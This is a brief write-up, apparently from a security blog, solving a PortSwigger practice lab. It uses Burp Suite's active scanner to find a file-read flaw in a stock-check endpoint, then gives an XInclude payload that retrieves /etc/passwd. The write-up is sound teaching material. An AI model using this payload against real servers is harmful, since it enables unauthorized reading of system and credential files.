Discovering vulnerabilities quickly with targeted scanning — Portswigger

This lab contains a vulnerability that enables you to read arbitrary files from the server. To solve the lab, retrieve the contents of /etc/passwd within 10 minutes | Approach

Karthikeyan Nagaraj
InfoSec Write-ups

--

Let’s Start — You have to solve the lab in 10 Minutes

Access the Lab, Turn on the Proxy, and Turn off your Intercept in Burpsuite

Now notice the Content list of HTTP history in the Proxy tab, you can see that there is a request /product/stockfrom that the Parameter ProductID is an endpoint to test.

Right-click on /product/stock→ Do Active Scan
Try to Change the Parameters to various values

The scanner found an Out-of-band resource load on /product/stock

It is possible to induce the application to retrieve the contents of an arbitrary external URL and return those contents in its own response.

  • Send the Request to the Repeater
  • Add the below Payload in ProductID Parameter
<foo xmlns:xi="http://www.w3.org/2001/XInclude"><xi:include parse="text" href="file:///etc/passwd"/></foo>

Send the Request, Now you can able to view the /etc/passwd

Feel Free to Ask Queries via LinkedIn and to Buy me a Cofee : )

Thank you for Reading!!

Happy Hunting ~

Author: Karthikeyan Nagaraj ~ Cyberw1ng

--

--

Security Researcher | Bug Hunter | Web Pentester | CTF Player | TryHackme Top 1% | AI Researcher | Blockchain Developer